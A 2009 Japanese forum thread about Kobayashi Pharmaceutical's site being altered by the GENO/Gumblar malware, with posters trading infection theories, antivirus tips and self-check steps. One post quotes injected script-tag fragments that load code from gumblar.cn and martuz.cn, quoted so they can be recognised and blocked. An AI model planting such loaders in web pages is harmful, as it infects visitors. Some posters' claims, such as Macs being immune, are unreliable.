【セキュリティ】サイトが改ざん被害、閲覧でウイルス感染の可能性(小林製薬)[09/05/14]
2 :
◆C.Hou68... :2009/05/17(日) 16:50:19 ID:y3Gke/L70
ニュー速でスレ立ってる奴か。
まとめ見ちゃってびびってた
GENOウィルスもここまで北か
4 :
名無しさん@九周年:2009/05/17(日) 16:50:44 ID:1glB3f690
小林製薬 サイトナオサナイト
5 :
zash:2009/05/17(日) 16:51:32 ID:1LIzJPIY0
ロサイト
6 :
名無しさん@九周年:2009/05/17(日) 16:51:46 ID:3wex6hNz0
現実は豚インフルでネットはGENOウイルスか
7 :
名無しさん@九周年:2009/05/17(日) 16:53:20 ID:bNBXftEOO
小林製薬の糸ようじ
genoの?
9 :
名無しさん@九周年:2009/05/17(日) 16:53:48 ID:RJLNv4HF0
小林製薬の糸ようじ
10 :
名無しさん@九周年:2009/05/17(日) 16:54:05 ID:gt1wPSgJ0
こえぇぇぇ!
2ちゃん見ただけでアホになる
ウィルスと一緒じゃんwww
11 :
名無しさん@九周年:2009/05/17(日) 16:54:16 ID:MlMzRwUwO
平賀サイト
「感染そのあとに」
14 :
名無しさん@九周年:2009/05/17(日) 16:56:01 ID:uPmKhQlN0
生活に必要のないものばかりを売る会社
15 :
名無しさん@九周年:2009/05/17(日) 16:58:22 ID:tL4sYMG00
製薬会社がウィルスに感染って笑えるなぁ
16 :
名無しさん@九周年:2009/05/17(日) 16:58:23 ID:buzMpw6xO
ついに立ったか
これ踏んだだけでアウトで、ワクチンないから初期化しかないからな
ブルースクリーン頻発クレカ情報抜かれるし
ちゃんとチェックしとけよ
17 :
名無しさん@九周年:2009/05/17(日) 16:58:58 ID:1glB3f690
小林製薬 ミタダケデアボーン
18 :
名無しさん@九周年:2009/05/17(日) 16:59:37 ID:q/7KjPZU0
これGENOなのか?
19 :
名無しさん@九周年:2009/05/17(日) 17:00:09 ID:rjplnH4I0
ミタラカカール
小林製薬の糸ようじ
21 :
名無しさん@九周年:2009/05/17(日) 17:00:30 ID:vJIC7omQ0
見ただけで感染というが、ActiveXとJava切ってありゃ問題ないんだろ?
見ただけでいきなりアウトかぁ
被害者多そうだね
>>21 JavaとJavaScriptの区別もついてないようでは危ないな
24 :
名無しさん@九周年:2009/05/17(日) 17:03:06 ID:R63t5gD40
JAVAとJavaScript
25 :
名無しさん@九周年:2009/05/17(日) 17:03:58 ID:m+pYzLXq0
ウィルスばら撒いてワクチンで儲けるのはよくある話だろ
27 :
名無しさん@九周年:2009/05/17(日) 17:04:49 ID:t2RQikMMO
ァッ! 小林製薬
小林製薬の感染元
Adobe Flash PlayerとAdobe Readerの脆弱性を突いて感染するので
JavaScript切っておいてもダメだと思う
30 :
名無しさん@九周年:2009/05/17(日) 17:05:55 ID:buzMpw6xO
因みに東方、ボカロの有名サイト感染らしいから
ニコ厨は終わったな
31 :
名無しさん@九周年:2009/05/17(日) 17:06:07 ID:vJIC7omQ0
>>23 JavaScriptのことをJavaって略しただけなんだけど
JavaとJavaScriptの違いぐらいわかってますぅヽ(`Д´)ノプンプン
これってGENOウイルス?
33 :
名無しさん@九周年:2009/05/17(日) 17:07:46 ID:SFSzT3r00
なんで小林製薬なんだ?
小林製薬のホスト感染中
なんかもうごっちゃになって、院内感染みたいな感じで批判されるだろうな
小林製薬は。全然違うレベルの話なのにな。
感染たらいいなをカタチにする
小林製薬の製品ってストレートな名前ばっかなのに、
フェミニーナ軟膏だけ誤魔化してるよな。
マンコール軟膏に改名すべきだ!
企業のトップページって
いちいちフラッシュだのJavaだの使っていてウザイよな。
シンプルに、テキストと画像だけにすれば
見るほうも気楽だし、今回のようなことも無いのに。
またGENOか
非常に凶悪なウイルスなので、感染したPCはOSクリーンインストールするか廃棄してください
現時点で感染前の状態に戻す方法はありません
クエンカの街を彩る小林製薬の糸ようじ
>>39 それだとウェブ屋が高い料金ふっかけられないかららしい
つまり真の犯人はマカ
GENOウイルス(亜種)はどんどん広がっているな
感染サイト行っただけで感染するのが悲惨
感染したらクリーンインストールしかない
クレカとかのPASも取られるし
フリーアンチウイルスのavast!が対応早いらしいが
46 :
名無しさん@九周年:2009/05/17(日) 17:11:09 ID:1glB3f690
>>44 なるほど、アホな話だなぁ。
重いページにイラついて、二度とそのページに行かない奴だっている。
それって、ビジネスチャンスを逃してるって事なのにね。
FTPじゃなくてSSH使ってればサーバへの侵入は防げたのにな
しかも外からFTPで接続出来るとか馬鹿じゃねーの?って感じ
これも「SSHはわかりません」とか平然とぬかしやがる
腐れマカのウェブ土方のせいだよな
50 :
名無しさん@九周年:2009/05/17(日) 17:14:06 ID:/KtaJlqi0
なんだか最近、PCが変だ・・。
オレも感染したかも。
・気がついたらAVGの常駐アイコンが消えていた。
・avgの自動更新が出来なくなった。
・CCクリーナーが使えなくなった(ファイルが壊れてると表示される)
ウイルスまとめてポイ
>>48 FLASHが重いサイトは、余程魅力がないと二度と行かないよな。
>>48 社内の人にウケるかどうかが大事でそれが全てだからそうなるのは仕方ない
54 :
名無しさん@九周年:2009/05/17(日) 17:15:48 ID:zJwCDwmv0
スクリプトとか切ってるのでフラッシュ無しで見られないとこはスルー
https://www.netsecurity.ne.jp/1_13221.html 1.「同サイト」を管理していた「社内PC」1台にコンピュータウイルスが感染
2.コンピュータウイルスは感染した「社内PC」のFTP通信を監視
3.コンピュータウイルスは感染した「社内PC」のFTP通信で使用された「設定情報」を記録
4.コンピュータウイルスは記録した「設定情報」を同社とは無関係の外部サーバに転送
5.外部サーバは「設定情報」を利用し「同サイト」にFTP通信で不正にアクセス
6.外部サーバは「同サイト」のhtml,php,js等のウェブ関連ファイルの一部をダウンロード
7.外部サーバはダウンロードしたファイルに悪意あるスクリプトを一定条件のもとに挿入
8.外部サーバはダウンロードしたファイルを「同サイト」にアップロード
56 :
名無しさん@九周年:2009/05/17(日) 17:18:47 ID:YYQFJPoa0
こっちでも感染か・・・
58 :
名無しさん@九周年:2009/05/17(日) 17:22:40 ID:mWX/de6T0
小林製薬のバックドア
アンチウイルスとアドビ関係のアップデートしてれば大丈夫だろうに
なんで感染するかなぁ
「よく使われる危険なパスワードTop500」にご注意を
ttp://slashdot.jp/security/comments.pl?sid=433667&cid=1486395 >実体験 (スコア:5, 参考になる)
>sayuporn (33927) : 2009年01月06日 20時38分 (#1486395) 日記
>サーバをインストールして、先方に渡し、
>DCに設置してもらってネットにつながってから色々作業しようと思ってました。
>で、rootのパスワードに「123456」を設定してました。
>メールで「ネットにつなぎましたよー」と連絡もらって、
>さあ作業しようと思ったらログインできません。ぎゃふん。
>東京から横浜まで行ってもらい、パスワードを再設定してもらいましたが、
>同じく「123456」だったので、その方がDCを出る頃にはまたワームに犯されてました。
>ワームに犯された上、ルートキットを孕ませられてしまったので、
>passwdでパスワードを変更してもshadowファイルを書き換えられてしまいます。
>のでしょうがないので、cronで1分おきにshadowファイルを上書きするようにして、
>泣きべそ書きながらrsyncでルートキットを駆除しました。
>>52-53 社内のLAN経由で表示テストして
実際の回線を使った場合、どれだけ重いのか気が付かないとか
ありそうだよね。
62 :
名無しさん@九周年:2009/05/17(日) 17:25:03 ID:x6GlOTwx0
この前、殺虫剤のCMが気になって製薬会社のホムペ見たからドキッとしたけどコヴァか、よかった見たのは緊張だった
♪うちの亭主はグアテマラ生まれ〜
63 :
名無しさん@九周年:2009/05/17(日) 17:26:32 ID:iBJfCT+b0
>>53 ワンマンで、頭の悪い、センスの無い社長の会社の場合、
よいしょして社長をコマーシャルに出させる、ってのと似た感じの戦略だな。
64 :
名無しさん@九周年:2009/05/17(日) 17:27:21 ID:zDQ/f9yU0
オンラインゲームでは数年前からあったな、そっちの犯人は中国だが。
このレベルの会社は自社でサーバを立てるべきじゃないよ
適当な大手のブログを選んで、
そこに自社のページを作る程度で妥協しておくべきだ
まぁブログへのアクセスにSSL使わなきゃやっぱりやられてたかもしれんがw
66 :
名無しさん@九周年:2009/05/17(日) 17:29:28 ID:m5beBtZT0
>>65 政府関連の天下り機関は金があるので自社サーバー
>>47 おれもでデリケートゾーンがなんなのか気になって眠れない毎日を過ごしてる。
デルピエロゾーンの仲間?
>>67 スクール水着の裏地が付いてる部分のことだ
感染したかな…
ウイルス対策ソフトの期限切れててさ…
71 :
名無しさん@九周年:2009/05/17(日) 17:36:27 ID:Sf8IhdqH0
改ざんするにしてもなんで小林製薬なんだろうね?
俺が知らないだけでものすごい人気サイトだったとか?
72 :
名無しさん@九周年:2009/05/17(日) 17:36:27 ID:RkuI9rV60
martuz.cnに飛ぶパターン
成美堂出版HP <script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
replica08●web●fc2●com <script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>
sound●jp/yudai_marimba/ <script src=//ma"+"rtuz.cn/vid/?id="+j+"><\/script>
gumblar.cnに飛ぶパターン
www●laqoo●net/kyouun/pet/index.html <script src=//gumblar.cn/rss/?id="+j+"><\/script>
pmpk●dojin●com <script src=//gumblar.cn/rss/?id="+j+"><\/script>
hosts書き換えて「zlkon.lv」「gumlar.cn」「martuz.cn」をアウトにしておくと(今は)OK
ただこの3つ以外にもあるかもしれないし、今後は増える
hosts書換えが嫌ならローカルプロキシとかプライベートプロキシとかの「PC内プロキシ」を入れて使えばいい
結論:adobeを今すぐ最新にすればいいだけじゃん(既に感染してたらクリーンインスコ♪)
>>59 セキュリティソフト入れたりWindowsアップデートはする人が多いけど
adobeのソフトウェアのアップデートはあまりする人がいないからじゃないかな
最近感染した人はともかくGENO初期はavast以外検出出来なかったし
74 :
名無しさん@九周年:2009/05/17(日) 17:37:17 ID:YbvbSUCE0
チンコムケア
75 :
名無しさん@九周年:2009/05/17(日) 17:39:08 ID:M0r8lB9T0
>>65 サービスで提供されてるブログ記事書くのにSSLって一般的なの?
そもそも大手会社のサイト管理者の端末が
ウイルスに汚染されてるっていうのが凄いなー。どっから貰ったんだろ。
76 :
名無しさん@九周年:2009/05/17(日) 17:47:01 ID:dWj9SGss0
77 :
名無しさん@九周年:2009/05/17(日) 17:47:16 ID:7/BF9jCV0
AntiVir入れてる俺のPCには無関係な話だよな?
79 :
名無しさん@九周年:2009/05/17(日) 17:52:59 ID:MG5Ab7Vq0
ページ見ただけで感染だから
豚なんとかより遥かに感染力高くて恐ろしいウイルスなのに
まだ知らない人多そうだよな
>>1 441 名前: ムラサキサギゴケ(catv?)[sage] 投稿日:2009/05/16(土) 23:32:08.96 ID:K/FFIX2k
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ビコン」公式サイト【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
81 :
名無しさん@九周年:2009/05/17(日) 17:55:19 ID:4+wV/Q9L0
>>71 「製薬会社」なのに、「ウィルスに感染」っていうネタじゃねーの?
82 :
名無しさん@九周年:2009/05/17(日) 17:55:35 ID:MG5Ab7Vq0
adobeのソフト最新版にするのは効果的だけど
アンチウイルスソフトは
亜種の多さからほとんど対応できてないから注意
acrobat7使ってるんだが、やばいのか
アップデート無いんだが
84 :
名無しさん@九周年:2009/05/17(日) 17:56:15 ID:GEs3+X//0
どんだけ新型の感染拡大が広がってるんだよ・・・
85 :
名無しさん@九周年:2009/05/17(日) 17:59:11 ID:YNedgkNj0
>>50 あきらめて、クリーンインストールしろ。
>>59 セキュリティソフトは結構ザルだったみたいよ。
それに重くなるので、アドビ関係のアップデートしない奴多い。
86 :
名無しさん@九周年:2009/05/17(日) 17:59:11 ID:PkC78V030
87 :
名無しさん@九周年:2009/05/17(日) 17:59:32 ID:3O1zdxkZ0
avast!は対応済みか、今度そっちも入れようかな
これってネカフェも怖いな、とりあえず
Adobe Flash PlayerとAdobe Reader最新のを
入れておいたらおk?
あとブラウザーはOperaかfirefoxもいいとかあったけど本当?
>>75 ログイン画面くらいはSSLの所探せばあるだろ
でも終わったらログアウトを習慣付けないとクッキー取られてだめか
カスペってまだ対応してないの?
>>81 ジョークグッズ屋だから、ピンとこないのも仕方が無い
>>87 プロキシとかファイアウォールとか、その辺の対策無しで
javascript切ってないんだったらブラウザ変えても意味無い気がするけど。
>>87 firefoxで、アドオン「NoScript」ってのを入れておくといい。
基本、全てのスクリプトをOFFにしておいて
サイト観覧で不都合が出た時だけ、個別にONにすることが出来る。
便利だよ。
chromeはそこらへん融通きかんのだよなぁ・・・
「GENOウイルスだそうです」
「痔のウイルスか…当社製品に塗り薬あったかな」
95 :
名無しさん@九周年:2009/05/17(日) 18:05:03 ID:3O1zdxkZ0
>>79 そりゃTVでやっていないからな、そんなもの
>>85 MSがWindows UpdateでFlashとAdobe Reader配布するようにして欲しいな
ていうかサードパーティーがWindows Update利用する枠組み提供しろや
>>87 Firefox入れるだけじゃなくnoscriptアドオンも併用しないとだめ
>>88 ブログサービスってあんまり使わないから
httpsで接続できるのってmixiくらいしか見たこと無いな。
Flash Blockも合わせて使っちゃいなYO
NoScript入れとけばFlashblockはいらなくね?
マカフィー使っている俺には関係ない話だな
>>101 あーでもNoScript使ってて不満なのは
許可与えるとJavaScriptもFlashも両方いっぺんに解除されちゃう事なんだよな
JavaScriptだけ許可してFlashだけブロックしたいって事はあるかも
105 :
名無しさん@九周年:2009/05/17(日) 18:27:02 ID:tXLIVLGn0
ウィルスバスター常駐監視の俺でもやられた
パターンファイルのアップロード中は常駐監視がオフになるという
基本的な事を無視してあるサイトの画像をダウンロードしたのが原因
一番最初に起動ファイルを壊されて再起不能
結局はOSのクリーン再インストール
とんでもねえ目にあっちまったべ
106 :
名無しさん@九周年:2009/05/17(日) 18:27:54 ID:BCJHPilA0
サーバはlinuxを使え!
タミフルでも打っとけ
110 :
名無しさん@九周年:2009/05/17(日) 18:40:47 ID:TofX6c5mO
Avast使っててよかった。でも小林製薬なんか見ないよ。
小林製薬の、糸ようじ
IPをwhoisしてみるとファーストサーバでホスティングかレンタルしてたんだな
そこにFTPで呑気に接続してたのか
113 :
名無しさん@九周年:2009/05/17(日) 19:09:30 ID:zDQ/f9yU0
伸びないね、かなり重要なことなのに
114 :
名無しさん@九周年:2009/05/17(日) 19:10:35 ID:DxbzHqQO0
115 :
マスゴミ:2009/05/17(日) 19:11:33 ID:jrk03S1p0
パソコンにマスクをつけていないから
VistaはUACが警告を出すので、普通に使ってる限りは大丈夫
>>113 このスレが伸びるくらいならVistaの売上ももうちょっと伸びてるだろw
また中国の仕業だな
国際社会から追放しろよ
119 :
名無しさん@九周年:2009/05/17(日) 19:23:14 ID:Tig68MPaP
感染その後に
ここの製品はネーミングだけじゃなく効能も胡散臭い気がする
あっ!小林製薬。
まあ小林製薬はへぼかったけど、
カカクコムメソッドがはびこる今の日本で
感染の経緯をつきとめ正直に公開した事は評価したい
対策が出来たらそれも公表して欲しいね
122 :
名無しさん@九周年:2009/05/17(日) 19:31:44 ID:SbqicqqD0
NOD32を使ってるけどやられてる可能性あるのかな。このソフト信用してるだが。
123 :
名無しさん@九周年:2009/05/17(日) 19:33:58 ID:s3D0yKJO0
心当たりがあったので、今、ウィルスチェックしてみたけど
感染しなかったようだ。一安心
124 :
名無しさん@九周年:2009/05/17(日) 19:34:14 ID:Q0o8sjQ40
125 :
名無しさん@九周年:2009/05/17(日) 19:35:57 ID:1toqui/z0
GENOの対策はキャッシュ消去してくださいはワラタな
ヤフーも地震速報見たいな感じでアップデート促してくれたらいいのに
クアンカの街を彩る・・・小林製薬の糸ようじ!
>107
129 :
名無しさん@九周年:2009/05/17(日) 19:50:51 ID:LNYnyzax0
130 :
名無しさん@九周年:2009/05/17(日) 19:51:55 ID:HU0QK/430
何が目的でこんな事するんだ
しかし俺毎日GENO見てたのに
なんでかかってないんだろ
かかってて気づいてないだけかもしれんが
132 :
名無しさん@九周年:2009/05/17(日) 19:56:07 ID:1S1N9irE0
ニフティの件はデマだったのか?
だったらデマスレ立てたやつは逮捕でいいよ
133 :
名無しさん@九周年:2009/05/17(日) 19:57:36 ID:o90lLzmk0
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したらAへ
Asqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
Bavast!(無料のアンチウイルスソフト)で確認
134 :
名無しさん@九周年:2009/05/17(日) 19:59:45 ID:eWz/jZxu0
>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。
135 :
名無しさん@九周年:2009/05/17(日) 20:00:07 ID:l6DtaFMu0
こういう事する奴って一体何が目的なの?何が楽しいんだ?
動機は何だ?小林製薬に対する恨み?
136 :
名無しさん@九周年:2009/05/17(日) 20:02:35 ID:SHPDjQGn0
137 :
名無しさん@九周年:2009/05/17(日) 20:03:54 ID:2J0GbIiF0
138 :
名無しさん@九周年:2009/05/17(日) 20:04:50 ID:We5mkVjl0
意外とやばい話題なのに現実世界のパンデミックのせいで盛り上がらんね
140 :
名無しさん@九周年:2009/05/17(日) 20:08:29 ID:vWubysrZ0
これ結構やばくないの
単にFTP鯖の外部からのアクセス切るかホワイトリストにすりゃいいだけ
一般ユーザならともかく、Webサービスやってる企業で固定IP引いてないって事はないだろ
カカクコムほどではないだろ
143 :
名無しさん@九周年:2009/05/17(日) 20:11:52 ID:We5mkVjl0
価格コムより酷いよw
ねずみ算式に感染元が増えるんだから
やっとか。
一部の板では一昨日から大騒ぎになっていたというのに
145 :
名無しさん@九周年:2009/05/17(日) 20:15:37 ID:YTw7rQla0
Windowsでネットするなんて神戸の高校に全裸で父兄参観するようなもんだろw
アンチウイルスなんてどこまでいっても対処療法。
OSの作り自体が悪いんだから、いつまでたっても抜本的には解決しないよ。
.糸 .小
.よ 林
う 製
じ 薬
の
147 :
名無しさん@九周年:2009/05/17(日) 20:19:59 ID:sMo+lYPKO
質問!
なぜクリーンインストールじゃないと直せないんだ?
ファイル上書きでなんとかなりそうだが
148 :
名無しさん@九周年:2009/05/17(日) 20:21:10 ID:We5mkVjl0
広がりに輪をかけてる一因として
突いてる脆弱性がAdobeのJavascriptインタプリタだからってのがある
Adobeって普及率稼いでる割に自動アップデートとかしないんだよね
致命的な欠陥でも告知しねえし
脆弱性自体は数ヶ月前に塞がれている物なのに
ユーザにアップデート告知しないで脆弱性の修正だけ公開したから
攻撃手段だけ公開したような状態になってる
本格的にバカかと
やばいいいいいいいいいい
150 :
名無しさん@九周年:2009/05/17(日) 20:26:59 ID:We5mkVjl0
>>147 改竄されるファイルがまだ全て判明してないから
亜種が出るのが早いって理由もある
151 :
名無しさん@九周年:2009/05/17(日) 20:28:57 ID:B222yddUO
ロリコンサイトへのウイルス埋め込みにも対処して下さい。
パソコン一台潰しちゃいました
とりあえずボカロとか東方とかのサイト回ってるヲタは注意しろ
感染率がひどいことになってる
153 :
名無しさん@九周年:2009/05/17(日) 20:35:00 ID:BsNSfoiOO
どうせ感染したんだしと意図的にバラまいてるやつもいるみたいだぞ
154 :
名無しさん@九周年:2009/05/17(日) 20:36:48 ID:a2Z8mJkF0
なあに、かえって免疫力がつく
国民には冷静な対応をお願いしたい。
156 :
名無しさん@九周年:2009/05/17(日) 20:38:04 ID:We5mkVjl0
Vistaを買わせたいMSの陰謀です
157 :
名無しさん@九周年:2009/05/17(日) 20:45:00 ID:RYBeSkNZO
ここ数日使ってないネットブックを立ち上げたら
ウイルスバスターがいないと言われて
再起動したらブルーだったけど
大丈夫だよな
158 :
名無しさん@九周年:2009/05/17(日) 20:46:24 ID:5mWQGV880
改竄
159 :
名無しさん@九周年:2009/05/17(日) 20:49:21 ID:sMo+lYPKO
>>150 なるほど、ありがとう。
ネット繋がってない我が家は最強ですね。
cmd.exe試したけど大丈夫だった・・
しかしこわくてどのサイトにもいけんな
マカフィー期限切れそうだし
オススメのフリーセキュリティソフトあったら教えてくれ
161 :
名無しさん@九周年:2009/05/17(日) 20:50:36 ID:DUwAL1gx0
ネットをすればGENOウィルスに感染し、外に出れば豚インフル
これすごく感染危険度が高いんだが・・・
このスレタイじゃ「関係ないや」って見もしない奴が大半だろうな。
163 :
名無しさん@九周年:2009/05/17(日) 20:51:04 ID:Db0i393p0
ニュー速+たつのが1日はおくれとる
おせ〜
165 :
名無しさん@九周年:2009/05/17(日) 20:52:15 ID:n8mFfwBF0
>>160 貧乏人乙w
フリーなんて言っているようではダメダメだな
166 :
名無しさん@九周年:2009/05/17(日) 20:53:01 ID:t0A5+4zC0
インターネットって怖いですねぇ
安心して見る事もできないんですねぇ
やはりテレビを見ているのが一番安心のようですね^^
なーんていう風になるといいですね!マスゴミさん
>>132 デマっつーか、単にnifにホムペ開設してた子がウィルスにやられたんじゃね?
で、ftpでホムペのページ更新したとたんにftpのパスワードをサクッと盗まれて
外部からindex.html改竄されたんだろうね。
自分は悪くない!と思ってるからNifのサーバがやられたに違いない!ってファビョったんだろwバカスww
>>1 +板、スレ立つのおっそ〜〜www
セキュリティ板やν速無印じゃとっくに話題になってるぞ
コンピュータウィルスだけは体がやられるわけじゃないから過剰に騒ぐ必要なし。
ソフト屋に勝手に騒がせておけばいい。
セキュリティソフトを一度も使わず12年の俺が言ってみる。
>>160 今のところavast!はこのウイルス探知できるらしい
でも亜種も出てるからどのウイルスソフトもアウアウだと思っといたほうがいい
171 :
名無しさん@九周年:2009/05/17(日) 20:55:48 ID:8MKXC816O
小林製薬の糸ち○こ
172 :
名無しさん@九周年:2009/05/17(日) 20:56:15 ID:JxPoByre0
>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。
173 :
名無しさん@九周年:2009/05/17(日) 20:56:42 ID:buzMpw6xO
東方、ボカロの大手サイトも感染してるからな
お前ら大丈夫か?
感染サイト踏んだらアウトだぞ?
174 :
名無しさん@九周年:2009/05/17(日) 20:56:56 ID:WMkb13sV0
>>133 ウイルスに感染してる場合cmd.exe(コマンドプロント)で
DOS窓開けると重症化するんじゃないの?心配だなあ
175 :
名無しさん@九周年:2009/05/17(日) 20:57:55 ID:vpzlU4qK0
国交省整備局のHPがウイルスに感染!!
ってタイトルだったらもうちょっと食いついてたかな
177 :
名無しさん@九周年:2009/05/17(日) 20:58:22 ID:spcZi1BU0
【ネットでも】GENOウィルス亜種が爆発的に増殖か 小林製薬や同人サイト他中心に感染も★5【新型ウィルス拡散中】
http://tsushima.2ch.net/test/read.cgi/news/1242555395/ ・小林製薬【対策済】
・BIG-server.com【対策済】 ←2chの鯖屋
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】 ← このバカショップが蔓延させた
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
>>169 ニートさんですか?
会社のPCがやられてしまうと企業にとってはダメージなんですよ、知ってました?
179 :
名無しさん@九周年:2009/05/17(日) 20:59:44 ID:rJNesMVKO
そのウイルス、人にも感染しますか?
>>157 再起動してブルーバックは感染しとる。
ノートン先生だのは反応しないので、チェックして安心と思っているやつは気をつけろ。
>>133の確認を忘れるな。
>>174 重症もなにも、感染した時点でオワリだから、関係ないんじゃないかな。
どっちにしたってクリーンインストールしか対処方法がない。
sqlsodbc.chmがそもそも存在しねえぞ
183 :
名無しさん@九周年:2009/05/17(日) 21:02:31 ID:We5mkVjl0
>>177 このリストだけ見てると大して広がってないように見えるよなー
実際に報告されてるサイトだけで100件以上あるわけだが
184 :
名無しさん@九周年:2009/05/17(日) 21:04:26 ID:JxPoByre0
つーか、いい加減Windowsでネットは禁止にしろや。。
186 :
名無しさん@九周年:2009/05/17(日) 21:07:50 ID:RYBeSkNZO
>>180 Thanks
いや昨日確かめて立ち上がるし、ファイルサイズも変わってないんだが
やっぱり亜種かな
187 :
名無しさん@九周年:2009/05/17(日) 21:10:59 ID:spcZi1BU0
>>183 正規のWebサイトに感染する新手のマルウェアが勢力を急拡大している。
2009年05月15日 08時24分 更新
5月6日〜5月13日のマルウェア報告数(Sophos調べ)
セキュリティ企業の英Sophosは、正規のWebサイトに感染する新手のマルウェアが出現し、猛威を振るっていると伝えた。
このマルウェア「JSRedir-R」はSophosが5月初旬に発見し、その後勢力を急拡大。
5月6日から13日の1週間の統計では、Webサイトに感染している全マルウェアの42%を占める規模になり、
これまで広く出回っていた2位の「Iframe-F」(7%)を大きく引き離した。
http://image.itmedia.co.jp/l/im/news/articles/0905/15/l_malware.jpg ← ぶっち切りwww
気付くの遅くね?
189 :
名無しさん@九周年:2009/05/17(日) 21:13:07 ID:spcZi1BU0
190 :
名無しさん@九周年:2009/05/17(日) 21:15:39 ID:JxPoByre0
サイトを見てるだけでウイルスに感染するというミラクル体験ができるのはWindowsだけ!(笑)
ここにもキチガイどもが集まりつつあるようだ
yarai2009の評価版まだかなぁ
あれならこういうのパターン無しで防御可能らしいんだが
193 :
名無しさん@九周年:2009/05/17(日) 21:17:10 ID:2J0GbIiF0
194 :
名無しさん@九周年:2009/05/17(日) 21:18:20 ID:spcZi1BU0
>>193 そりゃ、同人サイトが感染しまくりだったからだw
当然といえば当然
冷えピタン
>>192 あれはヒューリスティック検知だろ
今時のアンチウィルスでヒューりっテック検知搭載してない方が珍しい
>>196 普通のヒューリスティックだけじゃないお
こういう脆弱性狙った攻撃に特化したモジュールがあるの
説明聞いた俺が言うんだから間違いなし。
可愛い腐女子に手取り足取りLinuxの使い方を教えてあげたい
>>197 説明を鵜呑みにするのはお花畑の仕事だろw
200 :
名無しさん@九周年:2009/05/17(日) 21:23:47 ID:Gz7wcEUtO
もうちょい大きく取り上げようよこれ
おれは可愛い婦女子に手取り足取りLinuxの使い方を教えて欲しい
202 :
名無しさん@九周年:2009/05/17(日) 21:25:02 ID:F+Gf8vSu0
マックに替えて悠々とエロサイト巡り中のオイラが通りますよ・・・
>>199 いやいや
キミのいう「ヒューリスティク」と考えてるのはあのソフトの一部に過ぎない
ちゃんとどういう仕組みか見たの?
>>202 Adobe製品が問題の根本なんだからMacに変えても本質的な解決にならんだろ
205 :
名無しさん@九周年:2009/05/17(日) 21:36:15 ID:GSOwuAeJO
こういうニューススレはsageで書いちゃいかんよ。
★2まで行けば、そのときのスレタイに
「同人サイトがパンデミック??」
とかつけておけばみんな見るだろう。
★2まで行くかな…
そのためにはパンデミックちゃんのAAが必要だな
207 :
名無しさん@九周年:2009/05/17(日) 21:38:54 ID:GSOwuAeJO
ageで書こうageで!
ウィルス警報発令だ!
208 :
名無しさん@九周年:2009/05/17(日) 21:39:40 ID:O48q1Ahk0
>>204 マックというかUnix系のOSで「見ただけで感染する」なんてバカげたこと
起こりようがないからw
209 :
名無しさん@九周年:2009/05/17(日) 21:40:24 ID:2J0GbIiF0
まとめ見たら恐くてどこも踏めないんだけど
というか、まとめすら恐くて今日は見ていないw
>>208 前例がないだけで、ありえなくはないと思う。
糞製薬会社
潰れちまえよ
212 :
名無しさん@九周年:2009/05/17(日) 21:42:46 ID:4qpyO0wU0
>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。
>>208 UNIXでもLinuxでも起こりえる話だ
マカは愚かだな
俺はLinuxを使っていてもFlash Playerの脆弱性については常に注意を払っている
215 :
名無しさん@九周年:2009/05/17(日) 21:45:30 ID:pt6BBBXWO
普段よりPCが熱かったり反応がだるい気がするから新型ウイルスに感染したかも!
こうですか?
